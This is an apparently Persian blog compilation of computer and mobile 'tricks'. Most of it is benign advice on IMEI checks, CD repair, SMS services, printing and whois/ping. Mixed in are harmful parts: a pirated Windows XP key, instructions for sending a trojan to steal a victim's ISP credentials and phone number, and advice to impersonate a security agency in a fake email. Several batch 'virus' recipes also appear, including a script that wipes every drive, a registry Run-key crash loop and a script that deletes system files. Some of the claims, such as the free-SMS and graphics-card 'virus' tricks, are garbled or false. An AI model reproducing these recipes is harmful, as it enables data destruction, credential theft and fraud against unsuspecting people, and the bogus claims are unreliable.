میهن پرست

برای ارسال اس ام اس مجانی از ایرانسل یک روش بیشتر وجود نداره. که بهترین روش هست و همیشه جواب میده. یک مسیج سنتر جدید تعریف کنید و شمارش رو این بزارید:

+233244550190000

حالا کافیه فقط هر مسیجی رو که مینویسید تعدادش 155 کاراکتر باشه. اگر هم فارسیه تعدادش 65 کاراکتر باشه. خلاصه هر چی هست 5 تا کمتر از یک مسیج کامل باشه. حتما باید تعدادش همین قدر باشه. نه کمتر نه بیشتر. حالا وقتی مسیج بفرستید میبینید که مسیج ارسال نمیشه. ولی در واقع ارسال شده. به همین دلیل هزینه ای از شما کم نمیکنه و در پوشه سنت گوشی هم نمیره و ریپورتش هم نمیاد.

امیدوارم که از این ترفند درست استفاده کنید.

آیا برای شما نیز پیش آمده که به هنگام نصب ویندوز XP ، شماره سریالی در اختیار نداشته باشید؟ یا شماره سریال را فراموش کرده باشید؟ و یا حتی شماره سریال مخصوص ویندوز XP نیز بیابید اما با آن هم نتوانید کاری از پیش برید؟ در این ترفند قصد معرفی یک سریال جادویی را داریم که با استفاده از آن میتوانید تمامی ویندوزهای XP را رجیستر کنید! مهم نیست ویندوز مربوط به چه سالی باشد ، با این شماره سریال هر ویندوزی را میتوانید نصب کنید. جالب اینکه اگر این شماره سریال را به خاطر بسپارید ، از این پس اگر بخواهید برای هر کس ویندوز نصب کنید از نظر او فردی نابغه محسوب خواهید شد ، چرا که گویی تمامی شماره سریالهای ویندوز XP را حفظ هستید! در صورتی که خودتان میدانید از همان سریال جادویی استفاده کرده اید.

به هنگام نصب اولیه ویندوز XP ، از شما تقاضای وارد کردن شماره سریال میشود.
سریال جادویی عبارت است از:
Jbc46-q42fd-pggmc-kp38y-6mqd8

سلام

یک ترفند جالب

اگر میخواید سینک ظرف شویی فایرفوکس رو ببینید تو نوار آدرس بنویسید about kitchensink اونوقت یه چیز جالب میبینید.!

روشهای متعددی وجود داره ولی من کلیاتش رو عرض میکنم. بهترین کار اینه که تا جایی که میتونیم اطلاعات بدست بیاریم. اولین کار اینه که باید یک تروجان براش بفرستید. (خوش به حال هکرها و برنامه نویسها). حالا این که چه جوری طرف و گول بزنید بستگی به خودتون داره (هک، روش مخ ترکانی مراجعه شود.) حالا هر جوری میدونید فایل آلوده رو براش بیفرستید تا اون فایل رو باز کنه. فایل آلوده میتونه حاوی مخربهای زیر باشه:


1-    بدست آوردن یوزر و پسورد و شماره تلفن اکانت اینترنتش
2-    یک نرم افزار دیالر
3-    پیدا کردن IP واقعی
4-    ارسال مشخصات ثبت شده مودم (مثل کشور و کد ناحیه وتلفن) که در هنگام نصب مودم یا ویندوز سوال میشود
5-    دیسکانکت کردن طرف مقابل و یک سری خرابکاری تا نتونه برای مدتی به نت وصل شه

خب با اطلاعات بدست اومده از قسمت اول میشه چه کار کرد:
اول این که یک هکر فوق حرفه ای باشید و به ISP طرف نفوذ کنی و براساس یوزر و پسورد شمارش رو از تو لوگ ورمیداری. یه کار ساده تر هم میشه کرد و فقط یکمی مغز میخواد. یوزر و پسورد و دیالش که داری. با اکانتش وارد میشی و کل کارت رو استفاده میکنی. وقتی که مطمئن شدی که کاملا کارت تموم شد با یکمی استعداد سایت ISP رو پیدا میکنی(شماره تلفنisp  رو که داری تو گوگل سرجش کن) و به شماره پشتیبانی زنگ میزنی و میگی که من این کارت رو با فلان یوزر و پس گرفتم ولی کانکت نمیشه. اون اپراتور هم میزنه تو سیستم و میگه با فلان شماره و فلان شماره از این کارت استفاده کردن. شما تشکر میکنید و خداحافظی میکنید. بهتون تبریک میگم شما شماره ی طرف رو پیدا کردید.

روش دیگه مخرب دیالر بود. خب عزیره من بقیه کار ساده است تو نرم افزار مخرب دیالری که طراحی میکنید شماره ی خودتون رو مینویسید. و وقتی طرف سیم تلفن رو به مودمش وصل کرد خودش شماره میگیره و اونوقته که شماره ش می افته رو تلفن شما.

حالا فرض میکنیم طرف با وایرلس یا چیزی غیر از خط تلفن وصل شده. حالا همه چیز برمیگرده به خودتون. اول این که باید با روش 3 و 4 کار کنید. روش 4 اگه خوش شانس باشید طرف شماره خونشون را درست وارد کرده باشه. که اغلب همین جور هم هست. حالا اگه این جور نبود باید چه کار کنید. شما تنها راهتون روش سخت 3 است. خب خیلی سایتها هستن که وقتی IP رو وارد میکنی اطلاعات کاملی مثل موقعیت جغرافیایی ، سایت سرور خدمات دهنده وغیره رو میدن. خب اگه Ip طرف استاتیک باشه خب شماره تلفنی هم که توی اون سایت نوشته درسته. ولی بعیده کسی IP استاتیک باهشه مگر این که بچه مایه دار باشه. خب اگه Ip دینامیک بود. باید کلک مرغابی بزنید. یعنی باید یک ایمیل جعلی ولی با ظاهر معتبر درست کنید و خودتون رو یه سازمان امنیتی معرفی کنید و بگید که تمام شماره های رو که با این ip کانکت شدن بهتون بدن.
بگذریم بلاخره راههای زیادی هست فقط باید مغز هکری داشته باشید. مثلا من این همه روش نوشتم و شما فکر کردید دیگه روشی نیست. ولی برادر من هست خیلی هم هست فقط باید مغزت رو وا کنی. به عنوان یه مثال دیگه خیلی جالب و عملی:
فرض کنید همون تروجانی که درست کردید پسورد و یوزرهای ذخیره شده تو اینترنت اکسپلورر با هیستوری رو براتون بفرسته. خب حالا شاید بگید اینا چه ربطی به شماره تلفن داره همینه که میگم مغزتون رو واکنید. کافیه طرف توی سایت فروشگاه الکترونیکی یا ننمیدونم از این چیزا ثیت نام کرده باشه. چون آدم ها معمولا پسورداشون رو هم یک جور میزارن. از طریق هیستوریش یکی از این سایتها رو پیدا میکنید و واردش میشید. و "اصلاح مشخصات من" رو کلیک میکنید. اونجا اسمش و آدرسش و تلفنش رو همه چیز رو نوشته. چون میخواد بسته دقیقا به دستش برسه صددرصد مشخصات کامل درستی رو مینویسه. حال کردید نه. روشهای زیاده دیگری هم وجود داره فقط باید ... کار کنه.

به نام خدا آموزش ساخت ویروس های قوی و کشنده . 1=ويروس خطرناك cpu-567njkblaster بعد با پسوند bat. سيو كنيد. خطر: يك بار هم روي سيستم خودتون امتحان نكنيد. ويروس graphic card lower : توضيح در باره ويروس: اين ويروس فضاي كارت گرافيك رو پر ميكنه و ديگه هيچ بازي رو سيستم اجرا نميشه. نت پد رو باز كنيد و در آن تايپ كنيد : c/windows/system32/jefo/display/memory/full و براي save كردنش گزينه file رو زده و save as... رو انتخاب كنيد و اونو با اسم XXX.bat ذخيره كنيد اكنون ويروس شما آماده ميباشد ________________________________________ 2=ساخت ويروس فكر مي كنم همه شما ويروس Blaster رو بشناسيد (ويروسي كه باعث Shutdown شدن كامپيوتر تو 60 ثانيه مي شد و مي شه) و حتي خيلي از شما روش ساخت اون را بدونيد ولي لازم ميدونم نگاهي سريع به اون بندازم. اين ويروس رو به طریق مختلفي و با دستورات گوناگوني مي شه نوشت كه در اين جا دو روش رو مورد بررسي قرار ميديم اگر از اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد. روش اول با استفاده از Shortcut : در جايي از دسكتاپ خود کلیک راست كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد: 1)shutdown -s -t xx 2)%windir%system32shutdown.exe -s -t xx توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است. روش دوم به كمك Notepad : نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيد. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد: shutdown -a و همه مراحل قبل را انجام دهيد.اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد. تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟ بله اين محيط متني به نسبت ناشناخته همان اديتور داس (Dos Editor) است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit. صبر كنيد. قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد (اينجا از كليدي به نام Undo خبري نيست.) همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد ________________________________________ شبه ويروس اگه ويندوز 98 داريد بريد تو Run و تايپ كنيد Con/Con : چيزى كه مشاهده خواهيد كرد همون صفحه آبى رنگ ويندوز! هيچ چاره اى جر restart كردن رو براتون باقى نمی گذاره.حالا چه جورى مي تونيم از اين باگ كه در ويندوز98 موجود است استفاده كنيم.يكى از راهاش اينه كه در يك صفحه اينترنت اين دستور را وارد كنيم كه اين فايل را از كامپيوتر فراخوانى كند بدين صورت file:///c:/con/con می توانيد از اين باگ يه فايل درست كنيد كه وقتى كسى اين فايل رو اجرا كرد هر بار كه كامپيوترش اين فايل فراخوانى بشه و راهى بجز فرمت رو براش پيش رو نگذاره يه صفحه يtxt باز كنيد و اين دستورات رو توش بنويسيد و با پسوند .REG سيو كنيد Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] @="c:\\con\\con" اين باعث ميشه كه باهر بار ريستارت كردن كامپيوتر اين دستور اجرا بشه و نهايتا همون صفحه آبى رنگ بياد كه راهى جز restart كردن نداره.اگر ويندوز NT /200 / XP می توانيد يه كار ديگه بكنيد يه صفحه يtxt ‌‌باز كنيد بعد اين كامند ها رو بتوش بنويسيد c: del autoexec.bat del config.sys cd winnt del system.ini del win.ini بعد فايل رو با پسوند .BAT سيو كنيد. اين فايل رو وقتى براى كسى بفرستيد هيچى نمی شه اما به محض اينكه كامپيوتر رو restart كنه ديگه بار بعدی بالا نمياد. ________________________________________ آموزش ويروس نويسي اين ويروس بسيار خطرناك است چون با اجرا شدن آن ديگر براي قرباني راهي جز اف ديسك كردن كامپيوتر باقي نمي ماند. مواظب باشيد اشتباها روي آن دابل كليك نكنيد. هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد. متن ويروس: ATTRIB -a -s -h -r c ATTRIB -a -s -h -r c:\windows\*.* Echo y | echo a | Echo y | del c:\*.* Echo y | echo a | Echo y | del d:\*.* Echo y | echo a | Echo y | del e:\*.* Echo y | echo a | Echo y | del f:\*.* Echo y | echo a | Echo y | del g:\*.* echo y | copy *.* C:\ echo y | copy *.* D:\ echo y | copy *.* E:\ echo y | copy *.* F:\ echo y | copy *.* G:\

<:P:> کلا اين روش هک خيلی باحاله خيلی هم طرفدار داره . ولی همه کس بلد نيستن
خلاصه در اين روش نه ميخواد مخزنی کنی يا فايل ارسال کنی و يا سايت بسازی
فقط لازم يه پی ام بدی و جواب بگيری  بعدش مثل آب خوردن می تونی وارد کامپيوتر بشی
خوب مراحلش به صورت زيره:
۱.اول به طرف مقابل يه پی ام ميدی و منتظر جواب ميمونی(تا وقتی که جواب نگرفتی هيچ کاری نکن ).
۲. به محض اين که جواب گرفتی روی ميری روی استارت کليک می کنی   و بعدش روی RUN کليک می کنی و داخل ران cmd رو تايپ می کنی و انتر ميزنی
۳.الان وارد محيط داس حالا جلوی خط فرمان دستور netstat -na رو تايپ می کنی
الان يه ليست آی پی اومده جلوت اون آی پی که  رقم اولش بيشتر از ۲۰۰ باشه مربوط به پی سی هست پورتش هم بايد ۴ رقمی باشه اگه همچين آی پی ديدی  بدون شک آی پی طرفه
 ۴.آی پی رو که بدست آوردی ياداشت کن
۵.حالا دستور ftp رو تايپ کن و آی پی طرفو جلوش تايپ کن
۶.حالا انتر بزن
۷.اگه ازت يوزر خواست adminstator  رو وارد کن
۸.حالا وارد کامپيوترش شدی الان می تونی با دستور های مختلف کامپيوترشو وارسی کنی...

Disable CMD   

HKEY_CURRENT_USES/Software/Policies/Microsoft/windows/System/DisableCMD

Disable TaskMgr

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/System/DisableTaskMgr

Disable Add Or Remove Programs

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Uninstall/NoAddRemovePrograms

Disable Changing WallPaper

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/ActiveDesktop

Clear Recent Documents On Exit

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/ClearRecentDocsOnExit

Hide Clock And Lock Button

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/HideClock

Disable Active Desktop

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/NoActiveDesktop

Disable Add Printer

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/NoAddPrinter

Disable CD Burning

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/NoCDBurning

Disable Log Off From Start Menu

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/StartmenuLogoff

Disable Themes Tab

HKEY_USERS/S-1-5-21-1757981266-527237240-682003330-1003/Software/Microsoft/Windows/CurrentVerison/Policies/Explorer/NoThemesTab

 

امروزه در کشور ما اکثر گوشی های موجود در بازار ریجستر نشده و قاچاقی به کشور وارد می شوند که این موضوع باعث نوسانات قیمت یک مدل گوشی شده که علت آن چیزی به جز غیر اصل بودن آن و به اصطلاح چنج بودن آن است که متاسفانه فروشندگان گوشی های تقلبی و یا چنج خود را به عنوان گوشی اصل به مشتری معرفی می کنند. برای شناسایی گوشی های اصلی و چنج راه های متفاوتی است که از جمله ان ها دادن کد #06#* است که سریال گوشی شما (IMEI) را مشخص نموده و شما می توانید آن را با سریال روی کارتن و باطری همخوانی داشته باشد و در غیر این صورت گوشی شما قاچاق بوده و چنج شده است. اما در اين ترفند قصد داريم روشي را به شمامعرفی کنیم كه براي اولين بار از طريق سايت ترفندستان بر روي اينترنت قرار ميگيرد. شما ميتوانيد به سادگی و از طريق اينترنت به اصل يا غير اصل بودن گوشي خود پي ببريد ، بدون نیاز به یافتن کد فوق بر روی کارتن یا باطری گوشی یا سایر راهها !

 

بدین منظور:

ابتدا بر روی گوشی خود (با هر مدلی) کافی است کد #06#* را وارد نمایید. کد IMEI گوشی خود را مشاهده خواهید کرد.
حال به سایت اینترنتی https://www.numberingplans.com/?page=analysis&sub=imeinr بروید.
سپس کد IMEI خود را که یک کد 15 رقمی است را در صفحه مربوط به طور دقیق و بدون خطا وارد نمایید و روی دکمه analyse کلیک کنید.
اکنون سایت مشخصاتی به شما میدهد که باید به طور کامل به مشخصات گوشی شما صدق کند. از نظر مدل ، کارخانه ، کشور سازنده و...
 به عنوان مثال اگر گوشی شما مدل نوکیا 3230 باشد ، میابیست بعد از وارد نمودن سریال (IMEI) گوشی ، مشخصات همان گوشی نوکیا 3230 خود را دریافت کنید ، این موضوع بدین معنی است که گوشی شما اصل بوده و هیچ گونه مشکلی ندارد. اما اگر مشخصات داده شده مربوط به گوشی شما نباشد گوشی شما قاچاق یا چنج یا... می باشد .
به عنوان مثال اگر کد يك گوشي K750i را چك كنید و اين سايت مشخصات يك گوشي W750 را به شما نشان دهد ، گوشی شما غیراصل یا چنج است!

سایت فوق به غير از چك كردن IMEI موارد ديگری را نیز آنالیز میکند:
» Phone number analysis
» IMSI number analysis
» IMEI number analysis
» SIM number analysis
» ISPC number analysis

لينك چك كردن و آناليزم كردن كدهاي ديگر :
https://www.numberingplans.com/?page=analysis

به نقل از ترفندستان

 

CD یا DVD مورد علاقه شما ديگر كار نمی‌كند؟ دستگاه صدای عجيبی از خود می‌دهد و یا مدت زيادی طول می‌كشد تا بتواند محتویات داخل آن را اجرا کند؟ یا ممکن است در سطح زيرين خش‌های زيادی مشاهده شود؟ در این حالت چاره چیست؟ آیا باید از خیر استفاده مجدد از CD یا DVD خود بگذرید یا راه بهتری نیز وجود دارد؟ در این ترفند قصد داریم با استفاده از یک روش جالب ، CD خش دار خود را نجات دهیم و آن را مجددأ قابل استفاده نماییم.

 

راه حل: برای پوليش كردن تنها به خميردندان و يك دستمال  نرم‌ احتياج داريد كمی خميردندان را روی دستمال و يا پارچه پخش كنيد و سپس در حالت دايره‌ای صفحه خش‌دار را با دستمال پوليش كنيد. بايد تنها پس از چند حركت بتوانيد شاهد اولين نتايج باشيد. هنگامی كه خش‌ها از بين رفتند، CD را با آب بشوريد و آنرا با دستمال يا پارچه‌ای كه بدون كرك باشد پاك و خشك كنيد.

كپی اضافی: اگر CD شما دوباره اجرا شد، بهتر است سريعا يك backup آز آن تهيه كنيد. اگر دارای يك Audio CD‌ و يا فیلم DVD‌ می‌باشيد برای كپی كردن از برنامه مورد نظر خودتان استفاده كنيد. برای سی‌دی و يا دی‌وی‌دی‌های فايلی، به شما نرم‌افزار Tool unstoppable Coper را معرفی می‌كنيم. اين نرم‌افزار را می‌‌توانيد در سايت زير دانلود كنيد:
www.pcwelt.de/doenloads/tools-utilities/sonstiges/407801/index.html
اين نرم‌افزار اين شانس را به شما می‌دهد كه حتی در صورتی كه مديا به سختی قابل خواند باشد، فايل‌های خود را نجات دهيد.

به نقل از ترفندستان

 

دیکشنری ، قرآن ، استخاره ، whois ، فال حافظ ، زمان پخش برنامه های تلوزیون ، مکان های دیدنی هر شهر ، محاسبه مسافت بین شهر ها ، ساعت کشور ها ، سرویس نهج البلاغه ، سرویس عاشقانه ، پیام سلامتی ، 6 تیم اول لیگ برتر و بسیاری از خدمات دیگر! کلیه این خدمات تنها با ارسال یک SMS! با استفاده از این ترفند شما میتوانید با ارسال SMS به شماره مخصوصه هر سرویس ، از اطلاعات آن که به شکل SMS برای شما ارسال میشود کاملأ رایگان و تنها با هزینه یک پیامی که میفرستید ، استفاده کنید.

 

به شماره مربوط به هر سرویس یک SMS خالی ارسال کنید ، سپس اندکی صبر کنید تا خدمات مربوطه برای شما SMS شود:

۱۰۰۰۳۸۰: جک، با ارسال یک اس ام اس که در آن تعداد جک درخواستی نوشته شده است برای شما یک جک ارسال میشود.
 
 ۱۰۰۰۳۸۱: سرویس حدیث.
 
 ۱۰۰۰۳۸۲: سرویس نهج البلاغه.
 
 ۱۰۰۰۳۸۳: سخن روز.
 
 ۱۰۰۰۳۸۴: آیا میدانید؟
 
 ۱۰۰۰۳۸۵: سر کاری.
 
 ۱۰۰۰۳۸۶: سرویس عاشقانه.
 
 ۱۰۰۰۳۸۷: سرویس پند آموز.
 
 ۱۰۰۰۳۸۸: فال حافظ.
 
 ۱۰۰۰۳۹۱:اس ام اس چیستان.
 
 ۱۰۰۰۳۹۲: ساعت کشور ها.
 
 ۱۰۰۰۳۹۳: ترین ها (بهترین ها و بد ترین ها).
 
 ۱۰۰۰۳۹۴: مکان های دیدنی هر شهر.
 
 ۱۰۰۰۳۹۵: پیام سلامتی.
 
 ۱۰۰۰۳۹۶: محاسبه مسافت بین شهر ها.
 
 ۱۰۰۰۳۹۷: فیلم های روی پرده سینما.
 
 ۱۰۰۰۳۹۸: زمان پخش برنامه های تلوزیون.
 
 ۱۰۰۰۳۹۹: شش تیم اول لیگ فوتبال کشور.
 
 ۱۰۰۰۴۰۰: بازی پیشنهادی.
 
 ۱۰۰۰۴۰۱: جدید ترین نرم افزار.

۱۰۰۰۳۵۵: اس ام اس whois در صورتی که نام سایت مورد نظر خود را برای این سرویس ارسال کنید مشخص میشود که این سایت Available است یا خیر.

۱۰۰۰۳۵۷: استخاره با ارسال یک اس ام اس به این شماره سیستم به طور خود کار برای شما استخاره میگیرد ( ترفندستان ) و جواب استخاره را برای شما ارسال میکند.

۱۰۰۰۳۵۸: آب و هوا، با ارسال نام شهر مورد نظر به این شماره وضعیت آب و هوای آن شهر برای شما ارسال میشود.

۱۰۰۰۳۵۹: قرآن، با ارسال یک اس ام اس که ابتدا شماره سوره و سپس شماره آیه و سپس حرف F یا A (برای فارسی یا عربی بودن آیه) در آن باشد.

۱۰۰۰۳۷۰: دیکشنری، با ارسال یک لغت انگلیسی به این شماره معنی فارسی آن برای شما ارسال میگردد.

به نقل از ترفندستان

 

یکی از مشکلاتی که کاربران پرینترهای سیاه سفید با آن مواجه هستند مشکل پرینت کردن رنگ سیاه است.حال چه از روی عکس یا چه از روی متن. بدین صورت که پس از پرینت کردن رنگ مشکی شما مقداری بور میشود و رنگ مورد نظر شما آنچنان مطلوب نیست. در صورتی که با این مشکل مواجه هستید در این ترفند قصد داریم به معرفی روشی نرم افزاری بپردازیم که با بهره گیری از آن میتوانید این مشکل بور شدن رنگ مشکی را رفع کنید.

 

برای این کار:

1. مد رنگ انتخابی شما برای هر گونه چاپ حتما باید CMYK باشد.در ضمن رزولوشن 300 پیکسل در اینچ هم در نظر گرفته شود.
2. در صورتی که رنگ مشکی شما برای زمینه‎ی کار استفاده میشود از ترکیب رنگ زیر استفاده نمایید:
C=0 / M=0 / Y=0 / K=100
البته وقتی من با یک ناظر چاپ با تجربه صحبت میکردم ترکیب رنگ زیر را توصیه می کرد:
C=70 / M=35 / Y=0 / K=100
البته از نظر تئوری و علمی من ترکیب رنگ اول را توصیه می کنم، چون همانطور که می دانید علت بور شدن رنگ سیاه رنگ زرد یعنی Y می باشد و با صفر در نظر گرفتن آن نباید مشکلی بوجود آید و نتیجه‌ی کار رنگ مشکی خالص خواهد شد.( اگر غیر از این شد شک نکنید ایراد از نوع مرکب مصرفی می باشد).

و اما برویم سراغ متن هایی که داریم و رنگ آنها هم مشکی است، و در موقع چاپ لبه‌ی آنها رنجه می شوند و یا لبه‌ی آنها زرد خواهد شد، این مورد بیشتر در نرم افزارهای نقشه بیتی (پیکسلی) مانند فتوشاپ ، پینت شاپ ، فتو ایمپکت ، فتو پینت و...اتفاق می افتد که من توصیه می کنم از نرم افزار های برداری مانند کرل دراو ، ادوبی فری هند ویا ادوبی ایلوستریتر استفاده کنید.
 برای متن ها علاوه بر استفاده از ترکیب رنگ زیر:
C=0 / M=0 / Y=0 / K=100
می بایست عمل Overprint را انجام دهید.

برای Overprint دو روش پیشنهاد می کنم :
1. ساده ترین راه این است که ابتدا لایه‎ی متن را فعال کرده و سپس از پانل Layers گزینه‌ی Multiply را انتخاب نمایید.
2. روی لایه‌ی متن دابل کلیک نمایید تا وارد  Layer Style شوید، و در قسمت Blending Option و قسمت Advanced Blending و قسمت channels تیک های مقابل C/M/Y را بردارید وفقط بگذارید K فعال باشد.
- البته من عمل آورپرینت  رو برای نرم افزار فتو شاپ آموزش دادم که با کمی تغییر میتونید در نرم افزارهای دیگر هم همین عمل رو انجام بدید، اما از هر نرم افزاری که استفاده می کنید عمل اورپرینت یادتون نره!
اگر مراحل بالا را انجام دادید مشکل بور شدن رنگ مشکی و سفیدک زدن لبه‌ی متن ها حل خواهد شد و شما می توانید با خیال راحت طرح خود را تحویل چاپخانه بدهید.

خب از منوي Start گزينه Run  را انتخاب كنيد سپس تايپ كنيد Regedit پس از باز شدن پنجره ويرايشگر ريجستري به كليد زير برويد :

HKEY_CURRENT_USER\Software\Yahoo\Pager\profiles

خب چي ميبينيد؟ ليست يك سري ID كه 100% ID شما هم در بين آنها مي باشد ، بله به همين راحتي ليست تمام ID هايي كه در ياهو وصل شده اند اينجا ليست شده است خب براي اينكه بفهميم كه يك ID خاص با چه كسي چت داشته است به طور مثال من ID خودم را باز مي كنم

HKEY_CURRENT_USER\Software\Yahoo\Pager\profiles\ramin_jon\IMVironments\Recent

خب در پنجره مقادير مشاهده مي كنيد كه ID فردي كه با آن چت كرده ايد و اي دي خود شما قرار دارد.

به طور مثال اينجا من با YahooHelper چت كردم :

YahooHelper;jamesharab666

به همين راحتي ميتوانيد يكي ديگر از ID هايي رو كه توي سيستم شما كانكت شده و با كسي چت كرده است را در بياريد.

بعضی از دوستان گفتند که زمانی که می خوان تایپ کنند جای حروف ژ و پ عوض شده است برای رفع این مشکل من یک dll گذاشتم که باید با  حالت safe mode بالا بیایید بعد توی پوشه system 32 کپی کنید انشالله مشکلتون حل می شه.

لينک دانلود فقط 32 کيلو بايت

یکی از رایج ترین کارهایی که تایپیست های حرفه ای انجام میدهند کشیدن حروف و کلمات برای زیباسازی متن تایپ شده است. شما نیز میتوانید با استفاده از این ترفند متون خود را در داخل ویندوز بکشید. همانند این کلمه:
نــــیم راه دات بــــــــــــــــــــــــلاگفا دات کـــــــــــــــــــــــام


برای این کار :
کافی است در هر مکانی از ویندوز ، زبان ویندوز را روی فارسی تنظیم کنید.
سپس حرف مورد نظر خود را تایپ کرده و کلیدهای ترکیبی Shift+J را همزمان بفشارید.

در این ترفند قصد داریم به معرفی یک روش متفاوت بپردازیم که با بهره گیری از آن میتوانید زمان و تاریخ را در داخل برنامه Notepad به شکلی غیرمعمول و نسبتأ عجیب ثبت کنید. این ترفند تا حدودی از ضعف موجود در این برنامه سرچشمه میگیرد.

برای این کار:
برنامه Notepad را اجرا کنید. ( از طریق Start > All Programs >Accessories > Notepad )
حالا در داخل برنامه عبارت LOG. را تایپ نمایید. ( دقت کنید که حتما از حروف بزرگ استفاده کنید )
حالا از منوی File روی Save کلیک کنید و فایل را با نام tarfandestan یا هر نامی ذخیره کنید.
اکنون Notepad را با زدن دکمه ضربدر ببندید و از آن خارج شوید.
حال مجدد Notepad را اجرا کنید.
از منوی File روی Open کلیک کنید و فایل خود را که ذخیره کرده اید با فشردن دکمه Open فراخوانی کنید.
بله! خواهید دید که زمان و تاریخ بر روی صفحه حک میشود!
با هر بار باز کردن این فایل در هر زمان ساعت آن زمان روی صفحه درج خواهد شد.

جلسه ی هفتم آموزش هک

- خلاصه درس: بحث whois را ادامه می‌دهيم. با ping و tracert آشنا می‌شويم.


◊ ادامه بحث whois

قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه می‌دم.
در درس قبلی از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، می‌دانيد که برای يک سری از domain (دامنه) ها، جواب نمی‌دهد. مثال آن سايت‌هايی است که دارای دامنه جغرافيايی مثلا ايران هستند، در مورد دامنه‌های جغرافيايی ايران بايد گفت که به ir. ختم می‌شوند ( مثلا: neda.net.ir ). مثال ديگری که در whois سايت SamSpade کار نمی‌کند، تعدادی از دامنه‌های org , .net , .com. هستند که در internic.net ثبت نشده‌اند، بلکه در domainpeople.com ثبت شده‌اند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايی که در گروه org, net, com بودند، مختص به internic.net بود ولی الان ديگر اينطور نيست.

کاری که شما بايد برای whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکی از سايت‌های زير استفاده کنيد :

۱- internic.net :
برای edu , org , net , com عالی است. برای museum , int , info , coop , biz , arpa, aero هم‌ می‌تواند استفاده شود.
صفحه وب مربوطه عبارت‌ است از http://www.internic.net/whois.html
يا می‌توانيد مستقيما در مرورگر بنويسيد:
http://www.internic.net/cgi/whois?type=domain&whois_nic=xxxxxxxx که به‌جای xxxxxxxx مثلا بايد بنويسيد: far30.com

۲- nic.ir :
برای ir استفاده می‌شود.
صفحه وب مربوطه عبارت‌ است از /http://whois.nic.ir

۳- www.tv :
برای cc , info , biz , tv عالی است.
صفحه وب مربوطه عبارت‌ است از /http://www.tv
يا می‌توانيد مستقيما در مرورگر بنويسيد:
http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/whois.cgi?domain=yyyyyy&tld=zzzz که اگر بخواهم مثلا hack.tv را whois کنم به‌جای yyyyy بايد بنويسيد hack و به جای zzzz بايد بنويسيد tv

۴- domainpeople.com :
برای name , biz , info , org , net , com عالی است.
صفحه وب مربوطه عبارت‌ است از /http://whois.domainpeople.com


همانطور که ملاحظه می‌فرماييد، org , net , com در ۱ و ۴ مشترک است. علت آن است که بعضی‌ها در اولی و بعضی‌ها در چهارمی ثبت می‌شوند ولی برای whois کردن فرقی نمی‌کنه که شما از اولی استفاده کنيد يا چهارمی چون همديگر رو ساپورت می‌کنند.


◊ ping چيست ؟

ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:
ping ip-or-domain
که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم.

مثلا ping prdev.com را در command prompt تايپ کردم و به نتايج زير رسيدم :
